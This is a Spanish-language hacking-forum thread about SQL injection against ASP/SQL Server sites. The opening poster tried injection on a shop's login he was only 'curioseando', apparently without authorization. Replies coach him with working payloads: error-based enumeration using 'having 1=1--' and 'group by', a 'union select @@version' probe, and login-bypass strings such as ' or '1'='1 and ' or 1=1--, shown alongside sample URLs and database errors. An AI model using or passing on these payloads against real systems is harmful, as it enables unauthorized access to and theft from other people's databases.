elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  inquietud SQL Injection en ASP
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: inquietud SQL Injection en ASP  (Leído 7,152 veces)
BandidoOFF

Desconectado Desconectado

Mensajes: 61


El conocimiento es fruto del trabajo.


Ver Perfil
inquietud SQL Injection en ASP
« en: 21 Agosto 2006, 02:05 am »

Tengo una inquietud acerca de SQL Injection en paginas ASP.

Curioseando por ahi, intente hacer Sql Injection en una web hecha en ASP, la cual para ingresar se requiere  de un Correo Electronico y una Clave. Leyendo sobre las tecnica de Sql Injection aplique una de las formas mas conocidas, y me salio el siguiente error:

Microsoft VBScript compilation error '800a0411'

Name redefined

/tienda/template/menu.asp, line 22

Dim mscsUser
----^
Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '='.

/tienda/ingreso.asp, line 49

De este error puedo deducir segun mi humilde opinion que se trata de una BD SQL server usando un Protocolo o Driver general para acceso a la BD como OLE DB.

Ademas de la variable declarada en VbScript de nombre mscsUser

La pregunta es ¿Este error indica que puede ser vulnerable a SQL Injection?, si es asi, ¿como podria hacerlo?..o que me sugieren.

Gracias.


En línea

Entre mas se, mas dudas tengo.
[.:: NauJFracT ::.]


Desconectado Desconectado

Mensajes: 458


[ .:: NauJFracT ::.]


Ver Perfil
Re: inquietud SQL Injection en ASP
« Respuesta #1 en: 21 Agosto 2006, 06:41 am »

pues si conoces como son los registros de esa base de datos podrías hacer varias cosas, los conoces?
En línea

De vuelta...
BandidoOFF

Desconectado Desconectado

Mensajes: 61


El conocimiento es fruto del trabajo.


Ver Perfil
Re: inquietud SQL Injection en ASP
« Respuesta #2 en: 21 Agosto 2006, 21:50 pm »

La verdad no, solo hice una prueba y me salio el error que comente.
En línea

Entre mas se, mas dudas tengo.
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: inquietud SQL Injection en ASP
« Respuesta #3 en: 21 Agosto 2006, 21:52 pm »

lee los manuales de SQL Injection que hay en el foro.. ahi tambien puse links a otros docs.

Saludos!!
En línea

s0cratex

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: inquietud SQL Injection en ASP
« Respuesta #4 en: 26 Agosto 2006, 04:01 am »

Viendo tu error creo que no es necesario que pongas la comilla simple ' antes de las inyecciones.

Ahora intenta sacar el nombre de la tabla y los campos con:
having 1=1--
ex: http://www.sitio.com/noticia.asp?codigo=2 having 1=1--
ahora recibiras un error así:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'noticias.id_noticia' is invalid in the select list because it is...

Luego coges el nombre del campo noticias.id_noticia y lo inyectas así:
http://www.sitio.com/noticia.asp?codigo=2 group by noticias.id_noticia having 1=1--
y recibiras practicamente el mismo error pero con otro nombre de campo...

Una vez sacados todos los nombres de los campos podrías sacar la versión del MS-SQL con "union select":
http://www.sitio.com/noticia.asp?codigo=2 union select @@version,1,1,1--

deberas poner tantos "1" como campos haya en la tabla:
Tipo de error:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int.

Y así ir probando y probando:
Para más información busca en Internet, estos ejemplos los encontras claramente explicados aquí:

http://www.telefonica.net/web/espaiwebfacultat/asqlinj.zip

espero te sirva este post... by



En línea

------------------------------------
.:[| s0cratex security crazy |]:.
------------------------------------
servidor32

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: inquietud SQL Injection en ASP
« Respuesta #5 en: 24 Junio 2007, 04:24 am »

Bueno yo tambien tengo unos problemitas con la inyeccion de codigos resulta k pongo en el login y el password de una pagina asp esto login: ''or '1'=' y en el pass: ''or '1'=' lo mismo y me da el siguiente error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '1'.

/validar.asp, line 98
y cuando pongo having 1=1-- en el usuario y contraseña me dice contraseña o pass invalidos
« Última modificación: 25 Junio 2007, 03:05 am por servidor32 » En línea

wizache

Desconectado Desconectado

Mensajes: 143


El que poco sabe poco vive


Ver Perfil WWW
Re: inquietud SQL Injection en ASP
« Respuesta #6 en: 10 Julio 2007, 21:48 pm »

Bueno yo tambien tengo unos problemitas con la inyeccion de codigos resulta k pongo en el login y el password de una pagina asp esto login: ''or '1'=' y en el pass: ''or '1'=' lo mismo y me da el siguiente error:
en el lgin deberias poner
' or '1'='1
lo que dices que pusiste es incorrecto:
imagina la cadena sql:
SELECT * FROM ususario WHERE user='' or '1'='1' AND....
nota como la cadena es valida todos lso comillas se cierran correctamente en cambio con lo que tu envias no:
SELECT * FROM ususario WHERE user='''or '1'=' ' AND....

tambien pruedes probar el ya clasico
' or 1=1--
SELECT * FROM ususario WHERE user=''or 1=1 -- ' AND (todo esto se vuelve comentario)....
En línea

Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: inquietud SQL Injection en ASP
« Respuesta #7 en: 20 Julio 2007, 19:19 pm »

alguien entiende este error?:
al intentar:
http://www.vulnerable.com:80/search.asp?bqd=111-222-1933email@address.com&oper='

Recibo el siguiientye error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e21'

El controlador ODBC no admite las propiedades solicitadas.

/search.asp, line 106
En línea


Encuentros por Video y Chat !!
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: inquietud SQL Injection en ASP
« Respuesta #8 en: 20 Julio 2007, 19:27 pm »

Sí, que has roto la sintaxis de la consulta con la camilla simple.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Inquietud
Desarrollo Web
Carinoj 0 1,700 Último mensaje 3 Diciembre 2011, 00:03 am
por Carinoj
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines